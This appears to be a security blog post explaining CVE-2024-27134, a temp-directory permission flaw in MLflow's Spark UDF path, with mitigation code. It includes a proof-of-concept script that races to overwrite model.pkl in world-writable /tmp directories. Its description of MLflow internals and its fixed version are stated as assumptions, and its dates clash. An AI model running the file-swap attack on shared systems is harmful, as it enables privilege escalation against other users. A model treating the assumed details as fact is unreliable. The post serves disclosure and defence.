CVE-2024-27134 - Exploiting Excessive Directory Permissions in MLflow for Local Privilege Escalation with Spark

CVE-2024-27134 is a recently disclosed vulnerability found in MLflow, a popular open-source machine learning platform. The core of this issue revolves around excessive directory permissions in MLflow's handling of temporary files and directories created when you use the spark_udf() API. These improper permissions open the door to a local privilege escalation exploit, specifically via a Time-of-Check to Time-of-Use (ToCToU) attack.

If your machine learning team uses MLflow together with Apache Spark and leverages mlflow.pyfunc.spark_udf(), this vulnerability deserves immediate attention.

In this post, we’ll break down how the flaw works, show example code, and explain how an attacker can exploit it. As of this writing (June 2024), you should check your installed MLflow version and upgrade if it predates the fix.
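A quick way to see what is installed is to ask the package metadata. The sketch below is a minimal example, not an official check: the threshold 2.16.0 is an assumption about where the fix landed, so confirm it against the advisory before relying on it, and the helper names (parse_version, is_older_than, installed_mlflow_version) are hypothetical.

```python
from importlib import metadata

# ASSUMPTION: first release believed to contain the fix; verify against the advisory.
ASSUMED_FIXED_VERSION = "2.16.0"


def parse_version(text):
    """Turn '2.9.2' into (2, 9, 2); stops at the first part with no leading digits."""
    parts = []
    for piece in text.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def is_older_than(installed, fixed=ASSUMED_FIXED_VERSION):
    """Return True if the installed version sorts before the assumed fixed version."""
    return parse_version(installed) < parse_version(fixed)


def installed_mlflow_version():
    """Return the installed mlflow version string, or None if mlflow is absent."""
    try:
        return metadata.version("mlflow")
    except metadata.PackageNotFoundError:
        return None


version = installed_mlflow_version()
if version is None:
    print("mlflow is not installed in this environment")
elif is_older_than(version):
    print(f"mlflow {version} predates {ASSUMED_FIXED_VERSION}; plan an upgrade")
else:
    print(f"mlflow {version} is at or above {ASSUMED_FIXED_VERSION}")
```

The comparison is deliberately simple and ignores pre-release suffixes, so treat a borderline result as a prompt to read the release notes rather than as a verdict.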

Why is this Dangerous?

When MLflow creates temporary directories for its Spark UDF (User Defined Function) support, it sets permissions that are too broad (e.g., world-writable). A local attacker could exploit this moment, swapping or manipulating critical files between the time MLflow checks those permissions and the time it actually uses those files—this is known as a ToCToU attack.

Result:
The attacker can escalate privileges within the local system—potentially running code as the user who started the MLflow process (which could be root or another privileged account running workloads).
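To make "too broad" concrete: a directory that is writable by "other" and lacks the sticky bit lets any local user create, rename, or delete entries inside it, which is what makes swapping files possible. The following sketch lists such subdirectories under a parent directory. It is a defensive audit aid under my own assumptions, not something MLflow ships, and risky_subdirs is a hypothetical helper name.

```python
import os
import stat
import tempfile


def risky_subdirs(parent):
    """Yield subdirectories of parent that any local user can modify."""
    with os.scandir(parent) as entries:
        for entry in entries:
            try:
                if not entry.is_dir(follow_symlinks=False):
                    continue
                mode = entry.stat(follow_symlinks=False).st_mode
            except OSError:
                # Entry vanished or is unreadable; skip it.
                continue
            world_writable = bool(mode & stat.S_IWOTH)
            sticky = bool(mode & stat.S_ISVTX)
            if world_writable and not sticky:
                yield entry.path


# Example: audit the system temp directory used by tempfile.
for path in risky_subdirs(tempfile.gettempdir()):
    print(f"world-writable without sticky bit: {path}")
```

Running this on a shared host while Spark jobs are active is one way to spot exposed scratch directories, though an empty result does not prove the host is safe.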

Where is the Issue in the Code?

The vulnerability is in MLflow’s handling of temporary directories within its Python function (pyfunc) Spark UDF packaging process. Here’s a simplified code snippet highlighting the problem:

import mlflow.pyfunc
from pyspark.sql import SparkSession

# Sample user-defined function
def double(x):
    return x * 2

spark = SparkSession.builder.getOrCreate()

# This line triggers MLflow to create a temporary directory for the UDF
udf = mlflow.pyfunc.spark_udf(
    spark,
    model_uri="runs:/<my_run_id>/model",
    result_type="double",
)

# [Inside MLflow] (simplified, real code is inside mlflow/utils/file_utils.py)
import tempfile
import os

tmpdir = tempfile.mkdtemp()  # mkdtemp() itself creates the directory as 0o700 (owner only)
os.chmod(tmpdir, 0o777)      # Simplified assumption: permissions are then widened to all local users
# MLflow writes files here, without checking for race conditions.

Problem:
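The temporary directory ends up with weak permissions (like 0o777). Note that tempfile.mkdtemp() by itself creates an owner-only (0o700) directory, so the exposure appears to come from the permissions being widened afterwards. MLflow’s code doesn't guarantee atomicity or exclusivity over the directory’s contents.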
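The difference between a private and an exposed temp directory is easy to observe. This small sketch prints the permission bits of a directory fresh from tempfile.mkdtemp() and again after an explicit chmod to 0o777. The chmod stands in for whatever widens the permissions in the vulnerable code path; it is an illustration, not a copy of MLflow's source, and mode_of is a hypothetical helper.

```python
import os
import stat
import tempfile


def mode_of(path):
    """Return only the permission bits of path (e.g. 0o700)."""
    return stat.S_IMODE(os.stat(path).st_mode)


tmpdir = tempfile.mkdtemp()
print(oct(mode_of(tmpdir)))  # owner-only on a typical POSIX system

os.chmod(tmpdir, 0o777)      # illustrative widening: everyone may now write
print(oct(mode_of(tmpdir)))

os.rmdir(tmpdir)             # clean up the empty demo directory
```

On a typical Linux host the first line shows 0o700 and the second 0o777, which is the gap a local attacker needs.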

Here’s a simple step-by-step exploit scenario

1. MLflow calls tempfile.mkdtemp() to create a temp directory for its Spark UDF packaging. The directory ends up with overly broad permissions, meaning anyone on the machine may write to it.
2. Local attacker monitors the system for such directory creation (e.g., via inotify or repeated checks in /tmp).
3. Attacker replaces key files or the directory itself in the window between MLflow’s directory creation and when those files are actually used (classic ToCToU).
4. Malicious code executes: When MLflow or Spark loads the UDF, it accidentally runs the attacker’s payload, which can escalate privileges (e.g., to the MLflow service user or even root).
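The general defence against this kind of race is to check the object you actually opened rather than the path you were given. The sketch below opens a file first and then inspects the open descriptor with os.fstat(), refusing files that are not regular, not owned by the current user, or writable by group or others. It is POSIX-only (os.O_NOFOLLOW), open_if_private is a hypothetical helper, and it is not how MLflow loads artifacts.

```python
import os
import shutil
import stat
import tempfile


def open_if_private(path):
    """Open path for reading only if it is a regular file we own that others cannot write."""
    # O_NOFOLLOW makes the open fail if the final path component is a symlink.
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        # fstat inspects the opened file, not whatever the path points to now.
        info = os.fstat(fd)
        if not stat.S_ISREG(info.st_mode):
            raise PermissionError(f"{path} is not a regular file")
        if info.st_uid != os.geteuid():
            raise PermissionError(f"{path} is owned by another user")
        if info.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            raise PermissionError(f"{path} is writable by group or others")
        return os.fdopen(fd, "rb")
    except Exception:
        os.close(fd)
        raise


# Usage: a file we created with owner-only permissions passes the checks.
demo_dir = tempfile.mkdtemp()
demo_file = os.path.join(demo_dir, "artifact.bin")
with open(demo_file, "wb") as handle:
    handle.write(b"trusted bytes")
os.chmod(demo_file, 0o600)

with open_if_private(demo_file) as handle:
    print(handle.read())

shutil.rmtree(demo_dir, ignore_errors=True)
```

Because the checks and the read happen on the same descriptor, swapping the path after the open has no effect on what gets read.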

Example Exploit Script (Proof of Concept)

Please do not use this for malicious purposes—for education only!

import os
import time

WATCH_DIR = '/tmp'

def search_and_replace():
    while True:
        for entry in os.listdir(WATCH_DIR):
            entry_path = os.path.join(WATCH_DIR, entry)
            if entry.startswith('tmp') and os.path.isdir(entry_path):
                # Overwrite a file MLflow will use
                target_file = os.path.join(entry_path, 'model.pkl')
                with open(target_file, 'w') as f:
                    f.write('evil-pickle-payload')
                print(f'Evil payload written to {target_file}')
                return
        time.sleep(.1)

search_and_replace()

If a victim calls MLflow’s Spark UDF API while this script is running, the attacker could hijack the victim's process.

Who is Affected?

- Any use of mlflow.pyfunc.spark_udf().
- Especially dangerous if MLflow runs as a privileged user (root, or an ‘mlflow’ service account).

How to Mitigate

Upgrade MLflow:

Check the official MLflow GitHub Security Advisories or their release notes for patches or upgraded versions. Upgrades should patch the permissions used when creating temporary directories.

Harden File Permissions Manually:

Create a wrapper script or patch MLflow to set restrictive permissions (0o700) when creating temp directories.

Sample patch

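import os
import tempfile

# Instead of:
tmpdir = tempfile.mkdtemp()
# Do:
old_umask = os.umask(0o077)  # files created meanwhile get no group/other access
try:
    tmpdir = tempfile.mkdtemp()
    os.chmod(tmpdir, 0o700)  # enforce owner-only access explicitly
finally:
    os.umask(old_umask)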
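If you control the code that needs a scratch directory, the same idea can be wrapped in a context manager that creates the directory, verifies it is owner-only, and removes it afterwards. This is a minimal sketch under my own assumptions: private_tmpdir and the "mlflow-udf-" prefix are hypothetical names, and it does not change what MLflow does internally. Keep in mind that if Spark executors run under a different account, they would not be able to read an owner-only directory.

```python
import contextlib
import os
import shutil
import stat
import tempfile


@contextlib.contextmanager
def private_tmpdir(prefix="mlflow-udf-"):
    """Yield a temp directory that only the current user can access."""
    path = tempfile.mkdtemp(prefix=prefix)
    try:
        os.chmod(path, 0o700)  # enforce owner-only access explicitly
        mode = stat.S_IMODE(os.stat(path).st_mode)
        if mode != 0o700:
            raise RuntimeError(f"unexpected permissions {oct(mode)} on {path}")
        yield path
    finally:
        # Remove the directory and anything written into it.
        shutil.rmtree(path, ignore_errors=True)


# Usage: write scratch files inside the block; the directory is gone afterwards.
with private_tmpdir() as workdir:
    scratch = os.path.join(workdir, "scratch.txt")
    with open(scratch, "w") as handle:
        handle.write("only the owner can read this")
    print(os.path.exists(scratch))
```

The standard library's tempfile.TemporaryDirectory offers similar cleanup behaviour; the explicit version here just makes the permission check visible.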

References

- Original GHSA: GHSA-5jvh-4w3p-h593
- CVE record: CVE-2024-27134 at cve.org
- MLflow Documentation: mlflow.pyfunc.spark_udf API
- tempdir security issue background: Python Security Issue 22107

Conclusion

CVE-2024-27134 is a reminder that even "local only" vulnerabilities can lead to significant privilege escalation in shared environments. If your ML workloads use MLflow with Spark, review your deployment for this specific risk, check permissions, and upgrade as soon as fixes are available.

Stay secure—always check the permissions your code grants others, even on local temp files!

Timeline

Published on: 11/25/2024 14:15:06 UTC